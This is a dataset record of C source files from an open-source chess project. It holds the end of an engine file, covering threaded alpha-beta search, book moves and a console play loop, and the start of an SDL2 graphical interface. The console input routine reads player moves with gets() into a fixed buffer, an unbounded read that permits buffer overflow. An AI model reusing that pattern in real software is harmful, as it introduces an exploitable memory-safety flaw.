verbose) {\n\t// If the game has ended after this move, return\n\tif (hasGameEnded(position))\n\t\treturn (Node) { .score = endNodeEvaluation(position) };\n\n\t// If the depth has reached 1, then return the quiescence evaluation of the position\n\tif (depth <= 1)\n\t\treturn quiescenceSearch(position);\n\n\tint i;\n\tNode nodes[MAX_BRANCHING_FACTOR];\n\t// Find list of possible moves, ordered by the move's value using alphaBeta to calculate the score\n\tint moveCount = alphaBetaNodes(nodes, position, depth-1);\n\n\t// If there is only 1 possible move, return that move\n\tif (moveCount == 1) {\n\t\treturn nodes[0];\n\t}\n\n\n\tPosition firstPos;\n\t// Simulate first move\n\tupdatePosition(&firstPos, position, nodes[0].move);\n\t// Evaluate score of first move\n\tNode firstReply = idabThreaded(&firstPos, depth-1, FALSE);\n\n\t// If the first move wins the game, return that move\n\tif ( firstReply.score == winScore(position->toMove) ) {\n\t\tif (verbose) {\n\t\t\t\tprintf(\"Playing checkmate move: \");\n\t\t\t\tprintFullMove(nodes[0].move, position->board);\n\t\t\t\tprintf(\".\\n\");\n\t\t}\n\t\treturn (Node) { .move = nodes[0].move, .score = firstReply.score };\n\t}\n\n\tif (verbose) {\n\t\tprintf(\"Move \");\n\t\tprintFullMove(nodes[0].move, position->board);\n\t\tprintf(\" had score of %+.2f.\\n\", firstReply.score/100.0);\n\t\tprintf(\"Analyzing other %d possible moves with minimum depth of %d plies:\\n[\", moveCount-1, depth);\n\t\tfor (i=0; i<moveCount-1; i++)\n\t\t\tprintf(\" \");\n\t\tprintf(\"]\\r[\");\n\t\tfflush(stdout);\n\t}\n\n\tHANDLE threadHandles[MAX_BRANCHING_FACTOR];\n\tThreadInfo threadInfo[MAX_BRANCHING_FACTOR];\n\t// Initialize upper and lower bounds to maximum values\n\tint alpha = INT32_MIN;\n\tint beta = INT32_MAX;\n\n\t// Set upper and lower bounds\n\tif (position->toMove == WHITE) {\n\t\talpha = firstReply.score;\n\t} else {\n\t\tbeta = firstReply.score;\n\t}\n\n\t// For all possible moves\n\tfor (i=0; i<moveCount-1; i++) {\n\t\t// Initiallize thread struct \n\t\tthreadInfo[i].depth = depth-1;\n\t\tupdatePosition(&threadInfo[i].pos, position, nodes[i+1].move);\n\t\tthreadInfo[i].alpha = &alpha;\n\t\tthreadInfo[i].beta = &beta;\n\t\tthreadInfo[i].verbose = verbose;\n\n\t\t// Start threaded evaluation of the current move\n\t\tthreadHandles[i] = CreateThread(NULL, 0, evaluatePositionThreadFunction, (LPVOID) &threadInfo[i], 0, NULL);\n\n\t\t// If the thread failed to create, print an error message\n\t\tif ( threadHandles[i] == NULL ) {\n//\t\t\tprintf(\"Error launching process on move #%d!\\n\", i);\n\t\t\tprintf(\"!\");\n\t\t\tfflush(stdout);\n\t\t}\n\t}\n\n\t// Wait for threads to finish (windows command)\n\tWaitForMultipleObjects((DWORD) moveCount-1, threadHandles, TRUE, INFINITE);\n\tif (verbose) {\n\t\tprintf(\"] Done!\\n\");\n\t\tfflush(stdout);\n\t}\n\n\t// Retrieve best move\n\n\tMove bestMove = nodes[0].move;\n\tint bestMoveScore = firstReply.score;\n\tlong unsigned int retVal;\n\tint score;\n\tfor (i=0; i<moveCount-1; i++) {\n\t\t// Retrieve the exit value of the thread, which is the score of the position\n\t\tGetExitCodeThread(threadHandles[i], &retVal);\n\t\tscore = (int) retVal;\n\n\t\t// If the score is better than the current best score, update the best move and best score\n\t\tif ( (position->toMove == WHITE && score > bestMoveScore) || (position->toMove == BLACK && score < bestMoveScore) ) {\n\t\t\tbestMove = nodes[i+1].move;\n\t\t\tbestMoveScore = score;\n\t\t}\n\n\t\t// Deallocate thread\n\t\tif (CloseHandle(threadHandles[i]) == 0) {\n//\t\t\tprintf(\"Error on closing thread #%d!\\n\", i);\n\t\t\tprintf(\"x\");\n\t\t\tfflush(stdout);\n\t\t}\n\t}\n\n\treturn (Node) { .move = bestMove, .score = bestMoveScore };\n}\n\n// Same as idabThreadedBestFirst, but calls the hashed version of evaluatePositionThreadFunction\nNode idabThreadedBestFirstHashed(Position * position, int depth, BOOL verbose) {\n\t// If the game has ended after this move, return\n\tif (hasGameEnded(position)) {\n\t\tint score = endNodeEvaluation(position);\n\t\twriteToHashFile(position, score, 0);\n\t\treturn (Node) { .score = score };\n\t}\n\n\t// If the depth has reached 1, then return the quiescence evaluation of the position\n\tif (depth <= 1) {\n\t\tNode quie = quiescenceSearch(position);\n\t\twriteToHashFile(position, quie.score, depth);\n\t\treturn quie;\n\t}\n\n\tint i;\n\tNode nodes[MAX_BRANCHING_FACTOR];\n\t// Find list of possible moves, ordered by the move's value using alphaBeta to calculate the score\n\tint moveCount = alphaBetaNodes(nodes, position, depth-1);\n\n\t// If there is only 1 possible move, return that move\n\tif (moveCount == 1) {\n\t\treturn nodes[0];\n\t}\n\n\tPosition firstPos;\n\t// Simulate first move\n\tupdatePosition(&firstPos, position, nodes[0].move);\n\t// Evaluate score of first move\n\tNode firstReply = idabThreaded(&firstPos, depth-1, FALSE);\n\n\t// If the first move wins the game, return that move\n\tif ( firstReply.score == winScore(position->toMove) ) {\n\t\tif (verbose) {\n\t\t\t\tprintf(\"Playing checkmate move: \");\n\t\t\t\tprintFullMove(nodes[0].move, position->board);\n\t\t\t\tprintf(\".\\n\");\n\t\t}\n\t\twriteToHashFile(position, firstReply.score, depth);\n\t\treturn (Node) { .move = nodes[0].move, .score = firstReply.score };\n\t}\n\n\tif (verbose) {\n\t\tprintf(\"Move \");\n\t\tprintFullMove(nodes[0].move, position->board);\n\t\tprintf(\" had score of %+.2f.\\n\", firstReply.score/100.0);\n\t\tprintf(\"Analyzing other %d possible moves with minimum depth of %d plies:\\n[\", moveCount-1, depth);\n\t\tfor (i=0; i<moveCount-1; i++)\n\t\t\tprintf(\" \");\n\t\tprintf(\"]\\r[\");\n\t\tfflush(stdout);\n\t}\n\n\tHANDLE threadHandles[MAX_BRANCHING_FACTOR];\n\tThreadInfo threadInfo[MAX_BRANCHING_FACTOR];\n\t// Initialize upper and lower bounds to maximum values\n\tint alpha = INT32_MIN;\n\tint beta = INT32_MAX;\n\n\t// Set upper and lower bounds\n\tif (position->toMove == WHITE) {\n\t\talpha = firstReply.score;\n\t} else {\n\t\tbeta = firstReply.score;\n\t}\n\n\t// For all possible moves\n\tfor (i=0; i<moveCount-1; i++) {\n\t\t// Initiallize thread struct \n\t\tthreadInfo[i].depth = depth-1;\n\t\tupdatePosition(&threadInfo[i].pos, position, nodes[i+1].move);\n\t\tthreadInfo[i].alpha = &alpha;\n\t\tthreadInfo[i].beta = &beta;\n\t\tthreadInfo[i].verbose = verbose;\n\n\t\t// Start threaded evaluation of the current move\n\t\tthreadHandles[i] = CreateThread(NULL, 0, evaluatePositionThreadFunctionHashed, (LPVOID) &threadInfo[i], 0, NULL);\n\n\t\tif ( threadHandles[i] == NULL ) {\n//\t\t\tprintf(\"Error launching process on move #%d!\\n\", i);\n\t\t\tprintf(\"!\");\n\t\t\tfflush(stdout);\n\t\t}\n\t}\n\n\t// Wait for threads to finish (windows command)\n\tWaitForMultipleObjects((DWORD) moveCount-1, threadHandles, TRUE, INFINITE);\n\tif (verbose) {\n\t\tprintf(\"] Done!\\n\");\n\t\tfflush(stdout);\n\t}\n\n\t// Retrieve best move\n\n\tMove bestMove = nodes[0].move;\n\tint bestMoveScore = firstReply.score;\n\tlong unsigned int retVal;\n\tint score;\n\tfor (i=0; i<moveCount-1; i++) {\n\t\t// Retrieve the exit value of the thread, which is the score of the position\n\t\tGetExitCodeThread(threadHandles[i], &retVal);\n\t\tscore = (int) retVal;\n\n\t\twriteToHashFile(&threadInfo[i].pos, score, depth-1);\n\n\t\t// If the score is better than the current best score, update the best move and best score\n\t\tif ( (position->toMove == WHITE && score > bestMoveScore) || (position->toMove == BLACK && score < bestMoveScore) ) {\n\t\t\tbestMove = nodes[i+1].move;\n\t\t\tbestMoveScore = score;\n\t\t}\n\n\t\t// Deallocate thread\n\t\tif (CloseHandle(threadHandles[i]) == 0) {\n//\t\t\tprintf(\"Error on closing thread #%d!\\n\", i);\n\t\t\tprintf(\"x\");\n\t\t\tfflush(stdout);\n\t\t}\n\t}\n\n\twriteToHashFile(position, bestMoveScore, depth);\n\treturn (Node) { .move = bestMove, .score = bestMoveScore };\n}\n\n#endif /* _WIN32 */\n\n// Gets a random move\nMove getRandomMove(Position * position) {\n\tMove moves[MAX_BRANCHING_FACTOR];\n\t// Find all legal moves\n\tint totalMoves = legalMoves(moves, position, position->toMove);\n\t// Choose random move and return\n\tint chosenMove = rand() % totalMoves;\n\treturn moves[chosenMove];\n}\n\n// Initial searching for AI move\nMove getAIMove(Game * game, int depth) {\n\tprintf(\"--- AI ---\\n\");\n\tfflush(stdout);\n\n\t// If it is the first move, chooses initial game move using hardcoded initial moves from a .txt file\n\tif ( fromInitial(game) && countBookOccurrences(game) > 0 ) {\n\t\tprintf(\"There are %d available book continuations.\\n\", countBookOccurrences(game));\n\t\tfflush(stdout);\n\t\tMove bookMove = getBookMove(game);\n\t\tprintf(\"CHOSEN book move: \");\n\t\tprintFullMove(bookMove, game->position.board);\n\t\tprintf(\".\\n\");\n\t\tfflush(stdout);\n\t\treturn bookMove;\n\t}\n\n\t// Start timer for search\n\ttime_t startTime, endTime;\n\tstartTime = time(NULL);\n\n//\tMove move = getRandomMove(&game->position);\n//\tMove move = simpleEvaluation(&game->position).move;\n//\tMove move = minimax(&game->position, AI_DEPTH).move;\n//\tNode node = alphaBeta(&game->position, depth, INT32_MIN, INT32_MAX, TRUE);\n//\tNode node = iterativeDeepeningAlphaBeta(&game->position, depth, INT32_MIN, INT32_MAX, TRUE);\n//\tNode node = idabThreaded(&game->position, depth, TRUE);\n//\tNode node = idabThreadedBestFirst(&game->position, depth, TRUE);\n//\tNode node = idabThreadedBestFirstHashed(&game->position, depth, TRUE);\n\n\t// Search for best move using current position\n#ifdef _WIN32\n\tNode node = idabThreadedBestFirst(&game->position, depth, TRUE);\n#else\n\tNode node = iterativeDeepeningAlphaBeta(&game->position, depth, INT32_MIN, INT32_MAX, TRUE);\n#endif\n\n\t// End timer for search\n\tendTime = time(NULL);\n\n\t// Print which move was chosen, and how long it took\n\tprintf(\"CHOSEN move: \");\n\tprintFullMove(node.move, game->position.board);\n\tprintf(\" in %d seconds [%+.2f, %+.2f]\\n\", (int) (endTime-startTime), staticEvaluation(&game->position)/100.0, node.score/100.0);\n\tfflush(stdout);\n\n\treturn node.move;\n}\n\n// Parses a string for a move into a move struct\nMove parseMove(char * move) {\n\t// Converts first couple into a location\n\tint pos1 = str2index(&move[0]);\n\t// Converts second couple into a location\n\tint pos2 = str2index(&move[2]);\n\t// Generates move from 2 locations and returns\n\treturn generateMove(pos1, pos2);\n}\n\n// Gets player input for a move, parses into string and returns as move\nMove getPlayerMove() {\n\tchar input[100];\n\tgets( input );\n\treturn parseMove(input);\n}\n\n// Suggests a move by calling the AI move generator\nMove suggestMove(char fen[], int depth) {\n\tGame game;\n\tgetFenGame(&game, fen);\n\treturn getAIMove(&game, depth);\n}\n\n// ==============================================================\n// \t\t ========= PLAY LOOP (TEXT) ==========\n// ==============================================================\n\n// Prints out that the user is playing as white, then starts the game\nvoid playTextWhite(int depth) {\n\tprintf(\"Playing as WHITE!\\n\");\n\tfflush(stdout);\n\n\tGame game;\n\t// Initialize game\n\tgetInitialGame(&game);\n\n\t// While the game has not ended\n\twhile(TRUE) {\n\t\t// Print the game board\n\t\tprintBoard(game.position.board);\n\t\t// Check game end state\n if (hasGameEnded(&game.position))\n \tbreak;\n\n\t\t// Player moves\n makeMove(&game, getPlayerMove());\n\n\t\t// Print the game board\n printBoard(game.position.board);\n\t\t// Check game end state\n if (hasGameEnded(&game.position))\n\t\t\tbreak;\n\n\t\t// AI moves\n makeMove(&game, getAIMove(&game, depth));\n\t}\n\n\t// Prints the outcome of the game\n\tprintOutcome(&game.position);\n}\n\n// Prints out that the user is playing as black, then starts the game\nvoid playTextBlack(int depth) {\n\tprintf(\"Playing as BLACK!\\n\");\n\tfflush(stdout);\n\n\tGame game;\n\t// Initialize game\n\tgetInitialGame(&game);\n\n\t// While the game has not ended\n\twhile(TRUE) {\n\t\t// Print the game board\n\t\tprintBoard(game.position.board);\n\t\t// Check game end state\n if (hasGameEnded(&game.position))\n \tbreak;\n\n\t\t// Player moves\n makeMove(&game, getPlayerMove());\n\n\t\t// Print the game board\n printBoard(game.position.board);\n\t\t// Check game end state\n if (hasGameEnded(&game.position))\n\t\t\tbreak;\n\n\t\t// AI moves\n makeMove(&game, getAIMove(&game, depth));\n\t}\n\n\t// Prints the outcome of the game\n\tprintOutcome(&game.position);\n}\n\n// Decides how to start the game based on the value of WHITE and BLACK\nvoid playTextAs(char color, int depth) {\n\tif (color == WHITE)\n\t\tplayTextWhite(depth);\n\tif (color == BLACK)\n\t\tplayTextBlack(depth);\n}\n\n// Randomizes whether or not the first player is black or white, and calls playText As\nvoid playTextRandomColor(int depth) {\n\tchar colors[] = {WHITE, BLACK};\n\tchar color = colors[rand()%2];\n\tplayTextAs(color, depth);\n}\n\n// ===========================\n\n /*\nint main(int argc, char *argv[]) {\n\tsrand(time(NULL));\n\n\tplayTextRandomColor(DEFAULT_AI_DEPTH);\n\n\treturn EXIT_SUCCESS;\n}\n// */\n" }, { "alpha_fraction": 0.6274271607398987, "alphanum_fraction": 0.6446341872215271, "avg_line_length": 26.5898380279541, "blob_id": "fba019506606f64fd538407516ab241aca5984dc", "content_id": "8d3f399710b942ba81c536e6dd006947cf1adf73", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 23072, "license_type": "permissive", "max_line_length": 189, "num_lines": 807, "path": "/src/fast-chess-gui.c", "repo_name": "NoraQuick/fast-chess", "src_encoding": "UTF-8", "text": "/*\r\n ============================================================================\r\n Name : fast-chess-gui.c\r\n Author : Frederico Jordan <fredericojordan@gmail.com>\r\n Version :\r\n Copyright : Copyright (c) 2016 Frederico Jordan\r\n Description : Graphical user interface for simple chess game!\r\n ============================================================================\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <SDL2/SDL.h>\r\n#include <SDL2/SDL_blendmode.h>\r\n#include <SDL2/SDL_error.h>\r\n#include <SDL2/SDL_events.h>\r\n#include <SDL2/SDL_image.h>\r\n#include <SDL2/SDL_keyboard.h>\r\n#include <SDL2/SDL_keycode.h>\r\n#include <SDL2/SDL_main.h>\r\n#include <SDL2/SDL_pixels.h>\r\n#include <SDL2/SDL_rect.h>\r\n#include <SDL2/SDL_render.h>\r\n#include <SDL2/SDL_surface.h>\r\n#include <SDL2/SDL_video.h>\r\n#include <SDL2/SDL_ttf.h>\r\n#include <time.h>\r\n\r\n#include \"fast-chess.h\"\r\n\r\nint TILE_SIDE = 60;\r\n\r\nchar COLOR_SQUEMES[][6] = {\r\n\t\t\t\t\t\t\t{ 240, 217, 181, 181, 136, 99 }, // LICHESS\r\n\t\t\t\t\t\t\t{ 255, 255, 255, 240, 240, 240 }, // WHITE\r\n\t\t\t\t\t\t\t{ 240, 240, 240, 200, 200, 200 }, // LIGHT_GRAY\r\n\t\t\t\t\t\t\t{ 164, 164, 164, 136, 136, 136 }, // LICHESS_GRAY\r\n\t\t\t\t\t\t\t{ 140, 184, 219, 91, 131, 159 }, // ROYAL BLUE\r\n\t\t\t\t\t\t\t{ 255, 255, 255, 140, 184, 219 }, // WHITE/BLUE\r\n\t\t\t\t\t\t\t{ 212, 202, 190, 100, 92, 89 }, // CHESSWEBSITE\r\n\t\t\t\t\t\t };\r\nint bgColorNum = -1;\r\nchar BG_COLOR[6];\r\n\r\nint checkColor[] = { 0xFF, 0, 0, 0x80 };\r\nint lastMoveColor[] = {0x22, 0xFF, 0xAA, 0x80};\r\n\r\nBOOL heatmap = FALSE;\r\nint atkColor[] = { 0xFF, 0, 0 };\r\nint defColor[] = { 0, 0xFF, 0 };\r\nint heatmapTransparency = 0x30;\r\n\r\nSDL_Window* window = NULL; \t\t\t// The window we'll be rendering to\r\nSDL_Surface* screenSurface = NULL; \t// The surface contained by the window\r\nSDL_Renderer* renderer = NULL; // The main renderer\r\n\r\nSDL_Texture *bgTexture, *whiteBgTexture, *checkSquare, *lastMoveSquare, *heatmapAtkSquare, *heatmapDefSquare;\r\nSDL_Texture *bPawn, *bKnight, *bBishop, *bRook, *bQueen, *bKing;\r\nSDL_Texture *wPawn, *wKnight, *wBishop, *wRook, *wQueen, *wKing;\r\n\r\nTTF_Font *font;\r\n\r\nSDL_Texture * loadImage(char * fileLocation) {\r\n\tSDL_Surface* imgSurface = NULL;\r\n imgSurface = IMG_Load( fileLocation );\r\n\r\n if( imgSurface == NULL ) {\r\n printf( \"Unable to load image %s! SDL Error: %s\\n\", fileLocation, SDL_GetError() );\r\n return NULL;\r\n }\r\n\r\n SDL_Texture * dstTexture = SDL_CreateTextureFromSurface(renderer, imgSurface);\r\n SDL_FreeSurface( imgSurface );\r\n\r\n return dstTexture;\r\n}\r\n\r\nvoid loadImages(void) {\r\n\tbPawn = loadImage(\"images/black_pawn.png\");\r\n\tbKnight = loadImage(\"images/black_knight.png\");\r\n\tbBishop = loadImage(\"images/black_bishop.png\");\r\n\tbRook = loadImage(\"images/black_rook.png\");\r\n\tbQueen = loadImage(\"images/black_queen.png\");\r\n\tbKing = loadImage(\"images/black_king.png\");\r\n\r\n\twPawn = loadImage(\"images/white_pawn.png\");\r\n\twKnight = loadImage(\"images/white_knight.png\");\r\n\twBishop = loadImage(\"images/white_bishop.png\");\r\n\twRook = loadImage(\"images/white_rook.png\");\r\n\twQueen = loadImage(\"images/white_queen.png\");\r\n\twKing = loadImage(\"images/white_king.png\");\r\n}\r\n\r\nvoid close() {\r\n SDL_FreeSurface( screenSurface );\r\n screenSurface = NULL;\r\n\r\n SDL_DestroyWindow( window );\r\n window = NULL;\r\n SDL_Quit();\r\n}\r\n\r\nSDL_Rect index2rect(int index, char color) {\r\n\tint file = index%8;\r\n\tint rank = index/8;\r\n\r\n\tSDL_Rect tile;\r\n\r\n\tif (color == WHITE) {\r\n\t\ttile.x = file*TILE_SIDE;\r\n\t\ttile.y = (7-rank)*TILE_SIDE;\r\n\t\ttile.w = TILE_SIDE;\r\n\t\ttile.h = TILE_SIDE;\r\n\t} else if (color == BLACK) {\r\n\t\ttile.x = (7-file)*TILE_SIDE;\r\n\t\ttile.y = rank*TILE_SIDE;\r\n\t\ttile.w = TILE_SIDE;\r\n\t\ttile.h = TILE_SIDE;\r\n\t}\r\n\r\n\treturn tile;\r\n}\r\n\r\nSDL_Rect bb2rect(Bitboard bb, char color) {\r\n\treturn index2rect(bb2index(bb), color);\r\n}\r\n\r\nint xy2index(int x, int y, char color) {\r\n\tint file=0, rank=0;\r\n\tif (color == WHITE) {\r\n\t\tfile = (int) (x/TILE_SIDE);\r\n\t\trank = (int) (7 - (y/TILE_SIDE));\r\n\t} else if (color == BLACK) {\r\n\t\tfile = (int) (7 - (x/TILE_SIDE));\r\n\t\trank = (int) (y/TILE_SIDE);\r\n\t}\r\n\treturn 8*rank + file;\r\n}\r\n\r\nvoid int2str(int index) {\r\n\tint file = index%8;\r\n\tint rank = index/8;\r\n\r\n\tprintf(\"%c%c\", FILES[file], RANKS[rank]);\r\n\tfflush(stdout);\r\n}\r\n\r\nvoid xy2str(int x, int y, char color){\r\n\tint2str(xy2index(x, y, color));\r\n}\r\n\r\nvoid paintTile(SDL_Surface * destSurface, int position, char color[], char toMove) {\r\n\tSDL_Rect tile = index2rect(position, toMove);\r\n\tSDL_FillRect( destSurface, &tile, SDL_MapRGB( destSurface->format, color[0], color[1], color[2] ) );\r\n}\r\n\r\nSDL_Surface * createBoardSurface(char colors[]) {\r\n\tconst SDL_PixelFormat fmt = *(screenSurface->format);\r\n\tSDL_Surface * bgSurface = SDL_CreateRGBSurface(0, 8*TILE_SIDE, 8*TILE_SIDE, fmt.BitsPerPixel, fmt.Rmask, fmt.Gmask, fmt.Bmask, fmt.Amask );\r\n\r\n\tSDL_FillRect( bgSurface, NULL, SDL_MapRGB( bgSurface->format, colors[0], colors[1], colors[2] ) );\r\n\r\n\tint i;\r\n\tfor ( i=0; i<NUM_SQUARES; i++)\r\n\t\tif ( index2bb(i) & DARK_SQUARES )\r\n\t\t\tpaintTile(bgSurface, i, &colors[3], WHITE);\r\n\r\n\treturn bgSurface;\r\n}\r\n\r\nvoid loadBackground(void) {\r\n\tSDL_Surface * bgSurface = createBoardSurface(BG_COLOR);\r\n\r\n\tSDL_DestroyTexture(bgTexture);\r\n\tbgTexture = SDL_CreateTextureFromSurface(renderer, bgSurface);\r\n\r\n\tSDL_FreeSurface( bgSurface );\r\n}\r\n\r\nvoid loadWhiteBackground(void) {\r\n\tconst SDL_PixelFormat fmt = *(screenSurface->format);\r\n\tSDL_Surface * bgSurface = SDL_CreateRGBSurface(0, 8*TILE_SIDE, 8*TILE_SIDE, fmt.BitsPerPixel, fmt.Rmask, fmt.Gmask, fmt.Bmask, fmt.Amask );\r\n\tSDL_FillRect( bgSurface, NULL, SDL_MapRGB( bgSurface->format, 255, 255, 255 ) );\r\n\tSDL_DestroyTexture(whiteBgTexture);\r\n\twhiteBgTexture = SDL_CreateTextureFromSurface(renderer, bgSurface);\r\n\tSDL_FreeSurface( bgSurface );\r\n}\r\n\r\nvoid renderWhiteBackground(void) {\r\n\tSDL_Rect boardRect;\r\n\tboardRect.x = 0;\r\n\tboardRect.y = 0;\r\n\tboardRect.w = 8*TILE_SIDE;\r\n\tboardRect.h = 8*TILE_SIDE;\r\n\tSDL_RenderCopy(renderer, whiteBgTexture, NULL, &boardRect);\r\n}\r\n\r\nvoid renderBackground(void) {\r\n\tSDL_Rect boardRect;\r\n\tboardRect.x = 0;\r\n\tboardRect.y = 0;\r\n\tboardRect.w = 8*TILE_SIDE;\r\n\tboardRect.h = 8*TILE_SIDE;\r\n\tSDL_RenderCopy(renderer, bgTexture, NULL, &boardRect);\r\n}\r\n\r\nvoid renderAlgebricNotation(char color) {\r\n\tif ( TILE_SIDE < 40 )\r\n\t\treturn;\r\n\r\n\tconst char * const FILES_STR[8] = {\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\" };\r\n\tconst char * const RANKS_STR[8] = {\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\" };\r\n\tint i;\r\n\r\n\tfor (i=0; i<8; i++) {\r\n\t\tSDL_Color text_color = {BG_COLOR[0+3*(i%2)], BG_COLOR[1+3*(i%2)], BG_COLOR[2+3*(i%2)]};\r\n\t\tSDL_Surface* messageSurface = TTF_RenderText_Solid(font, color==WHITE?RANKS_STR[i]:RANKS_STR[7-i], text_color);\r\n\t\tif ( messageSurface == NULL )\r\n\t\t\tcontinue;\r\n\r\n\r\n\t\tSDL_Texture* messageTexture = SDL_CreateTextureFromSurface(renderer, messageSurface);\r\n\t\tSDL_FreeSurface( messageSurface );\r\n\r\n\t\tSDL_Rect tile = index2rect(8*i, WHITE);\r\n\t\ttile.w /= 6;\r\n\t\ttile.h /= 4;\r\n\t\tSDL_RenderCopy(renderer, messageTexture, NULL, &tile);\r\n\t\tSDL_DestroyTexture(messageTexture);\r\n\r\n\t\tmessageSurface = TTF_RenderText_Solid(font, color==WHITE?FILES_STR[i]:FILES_STR[7-i], text_color);\r\n\t\tif ( messageSurface == NULL )\r\n\t\t\tcontinue;\r\n\r\n\t\tmessageTexture = SDL_CreateTextureFromSurface(renderer, messageSurface);\r\n\t\tSDL_FreeSurface( messageSurface );\r\n\r\n\t\ttile = index2rect(i, WHITE);\r\n\t\ttile.x += 1;\r\n\t\ttile.y += tile.h*3/4;\r\n\t\ttile.w /= 6;\r\n\t\ttile.h /= 4;\r\n\t\tSDL_RenderCopy(renderer, messageTexture, NULL, &tile);\r\n\t\tSDL_DestroyTexture(messageTexture);\r\n\t}\r\n}\r\n\r\nSDL_Texture * getPieceTexture(int piece) {\r\n\tswitch(piece) {\r\n\tcase BLACK|PAWN:\r\n\t\treturn bPawn;\r\n\r\n\tcase BLACK|KNIGHT:\r\n\t\treturn bKnight;\r\n\r\n\tcase BLACK|BISHOP:\r\n\t\treturn bBishop;\r\n\r\n\tcase BLACK|ROOK:\r\n\t\treturn bRook;\r\n\r\n\tcase BLACK|QUEEN:\r\n\t\treturn bQueen;\r\n\r\n\tcase BLACK|KING:\r\n\t\treturn bKing;\r\n\r\n\tcase WHITE|PAWN:\r\n\t\treturn wPawn;\r\n\r\n\tcase WHITE|KNIGHT:\r\n\t\treturn wKnight;\r\n\r\n\tcase WHITE|BISHOP:\r\n\t\treturn wBishop;\r\n\r\n\tcase WHITE|ROOK:\r\n\t\treturn wRook;\r\n\r\n\tcase WHITE|QUEEN:\r\n\treturn wQueen;\r\n\r\n\tcase WHITE|KING:\r\n\t\treturn wKing;\r\n\t}\r\n\r\n\treturn NULL;\r\n}\r\n\r\nvoid renderPieces(int board[], char color) {\r\n\tint i;\r\n\tfor (i=0; i<NUM_SQUARES; i++) {\r\n\t\tint piece = board[i];\r\n\r\n\t\tif ( piece != EMPTY ) {\r\n\t\t\tSDL_Rect squareRect = index2rect(i, color);\r\n\t\t\tSDL_RenderCopy(renderer, getPieceTexture(piece), NULL, &squareRect);\r\n\t\t}\r\n\t}\r\n}\r\n\r\nvoid renderCheck(int board[], char color) {\r\n\tif (isCheck(board, WHITE)) {\r\n\t\tBitboard kingPos = getKing(board, WHITE);\r\n\t\tSDL_Rect checkRect = bb2rect(kingPos, color);\r\n\t\tSDL_RenderCopy(renderer, checkSquare, NULL, &checkRect);\r\n\t} else if (isCheck(board, BLACK)) {\r\n\t\tBitboard kingPos = getKing(board, BLACK);\r\n\t\tSDL_Rect checkRect = bb2rect(kingPos, color);\r\n\t\tSDL_RenderCopy(renderer, checkSquare, NULL, &checkRect);\r\n\t}\r\n}\r\n\r\nvoid renderLastMove(int lastMove, char color) {\r\n\tif ( lastMove != 0 ) {\r\n\t\tSDL_Rect to_Rect = bb2rect(index2bb(getTo(lastMove)), color);\r\n\t\tSDL_Rect from_Rect = bb2rect(index2bb(getFrom(lastMove)), color);\r\n\t\tSDL_RenderCopy(renderer, lastMoveSquare, NULL, &to_Rect);\r\n\t\tSDL_RenderCopy(renderer, lastMoveSquare, NULL, &from_Rect);\r\n\t}\r\n}\r\n\r\nvoid renderRegularBoard(int board[], char color, Move lastMove) {\r\n\tSDL_RenderClear(renderer);\r\n\trenderBackground();\r\n\trenderAlgebricNotation(color);\r\n\trenderCheck(board, color);\r\n\trenderLastMove(lastMove, color);\r\n\trenderPieces(board, color);\r\n\tSDL_RenderPresent(renderer);\r\n}\r\n\r\nvoid renderHeatTiles(int board[], char color) {\r\n\tint atkValue, i, j;\r\n\r\n\tfor (i=0; i<NUM_SQUARES; i++) {\r\n\t\tBitboard target = index2bb(i);\r\n\t\tatkValue = countAttacks(target, board, color) - countAttacks(target, board, opponent(color));\r\n\r\n\t\tSDL_Rect targetRect = bb2rect(target, color);\r\n\r\n\t\tif ( atkValue < 0 ) {\r\n\t\t\tfor (j=0; j<-atkValue; j++)\r\n\t\t\t\tSDL_RenderCopy(renderer, heatmapAtkSquare, NULL, &targetRect);\r\n\t\t} else if ( atkValue > 0 ) {\r\n\t\t\tfor (j=0; j<atkValue; j++)\r\n\t\t\t\tSDL_RenderCopy(renderer, heatmapDefSquare, NULL, &targetRect);\r\n\t\t}\r\n\t}\r\n}\r\n\r\n\r\n\r\nvoid renderHeatmapBoard(int board[], char color, Move lastMove) {\r\n\tSDL_RenderClear(renderer);\r\n\trenderWhiteBackground();\r\n\trenderHeatTiles(board, color);\r\n//\trenderCheck(board, color);\r\n//\trenderLastMove(lastMove, color);\r\n\trenderPieces(board, color);\r\n\tSDL_RenderPresent(renderer);\r\n}\r\n\r\nvoid renderBoard(int board[], char color, Move lastMove) {\r\n\tif (heatmap) {\r\n\t\trenderHeatmapBoard(board, color, lastMove);\r\n\t} else {\r\n\t\trenderRegularBoard(board, color, lastMove);\r\n\t}\r\n}\r\n\r\nvoid loadHeatTiles(void) {\r\n\tconst SDL_PixelFormat fmt = *(screenSurface->format);\r\n\r\n\tSDL_Surface * atkSurf = SDL_CreateRGBSurface(0, 10, 10, fmt.BitsPerPixel, fmt.Rmask, fmt.Gmask, fmt.Bmask, fmt.Amask );\r\n\tSDL_FillRect( atkSurf, NULL, SDL_MapRGB(screenSurface->format, atkColor[0], atkColor[1], atkColor[2]));\r\n\tSDL_DestroyTexture(heatmapAtkSquare);\r\n\theatmapAtkSquare = SDL_CreateTextureFromSurface(renderer, atkSurf);\r\n\tSDL_SetTextureBlendMode( heatmapAtkSquare, SDL_BLENDMODE_BLEND );\r\n\tSDL_SetTextureAlphaMod( heatmapAtkSquare, heatmapTransparency );\r\n\tSDL_FreeSurface( atkSurf );\r\n\r\n\tSDL_Surface * defSurf = SDL_CreateRGBSurface(0, 10, 10, fmt.BitsPerPixel, fmt.Rmask, fmt.Gmask, fmt.Bmask, fmt.Amask );\r\n\tSDL_FillRect( defSurf, NULL, SDL_MapRGB(screenSurface->format, defColor[0], defColor[1], defColor[2]));\r\n\tSDL_DestroyTexture(heatmapDefSquare);\r\n\theatmapDefSquare = SDL_CreateTextureFromSurface(renderer, defSurf);\r\n\tSDL_SetTextureBlendMode( heatmapDefSquare, SDL_BLENDMODE_BLEND );\r\n\tSDL_SetTextureAlphaMod( heatmapDefSquare, heatmapTransparency );\r\n\tSDL_FreeSurface( defSurf );\r\n}\r\n\r\nvoid loadCheckSquare(void) {\r\n\tconst SDL_PixelFormat fmt = *(screenSurface->format);\r\n\tSDL_Surface * checkSurf = SDL_CreateRGBSurface(0, 10, 10, fmt.BitsPerPixel, 